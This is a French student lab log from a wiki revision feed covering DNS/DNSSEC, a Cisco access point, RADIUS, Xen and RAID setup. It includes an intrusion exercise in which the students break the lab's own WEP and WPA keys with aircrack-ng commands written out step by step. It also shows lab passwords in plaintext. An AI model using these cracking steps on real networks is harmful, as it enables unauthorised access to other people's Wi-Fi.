===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz.net ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60285</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60285"/>
				<updated>2022-11-29T00:06:45Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Vérifier son DNS avec dnsviz */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Vérification&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
